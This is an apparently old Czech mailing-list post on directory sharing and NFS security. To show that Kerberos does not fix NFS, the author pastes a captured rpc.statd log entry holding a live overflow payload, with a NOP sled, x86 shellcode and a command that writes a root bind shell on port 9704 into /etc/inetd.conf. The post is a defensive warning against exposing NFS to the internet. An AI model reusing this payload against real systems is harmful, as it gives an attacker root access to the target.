sdileni adresaru v siti

[Michal Dobes]

"Míla Kuchta" wrote:
> > : Jinak reseni ve svete Unixu se jmenuje NFS, pripadne automaticke pripojeni
> > : svazku pri pristupu do sdileneho adresare jde take nstavit.
> >
> > Dotaz: jak je na tom _soucasne_ nfs co se tyce bezpecnosti? Rika se, ze je
> > to cele jedna velka dira (bezpecnostni).
> 
> Co se tyce linuxove implementace, tak bohuzel ano. Ne ze by to na ostatnich
> platformach bylo lepsi, ale treba na sunech to trochu tlumi Secure RPC.
> Je to IMHO spatne navrzeny protokol. Zkuste kerbera.

Kerberos pomuze jen v necem. Stale nezabrani prasarne typu:

Aug 19 11:16:00 lektor2 rpc.statd[349]: SM_MON request for hostname
containing '/': ^D÷˙ż^D÷˙ż^E÷˙ż^E÷˙ż^F÷˙ż^F÷˙ż^G÷˙ż^G÷˙ż08049f10
bffff754
000028f8 4d5f4d53
72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961
2720676e 203a272f
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000bffff70400000000000000000000000000000000000000000000000bffff7050000bffff7060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90>

<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>ëK^<89>vŹ<83>î
<8D>^(<83>Ć <89>^°<83>î <8D>^.<83>Ć <83>Ă <83>ë#<89>^´1Ŕ<83>î
<88>F'<88>F*<83>Ć <88>FŤ<89>F¸°+,
<89>ó<8D>NŹ<8D>V¸Í<80>1Ű<89>Ř@Í<80>č°˙˙˙/bin/sh -c echo 9704 stream tcp
nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inet

Vysledek akce asi neni treba rozebirat. Na RH6.2cz to funguje
spolehlive. :-)
Mit NFS veci jakkoliv dostupne z internetu je velice nerozumne.
Zajimava by mohla byt CODA, ale kam postoupil vyvoj?

	Majkl (majkl na tesnet.cz)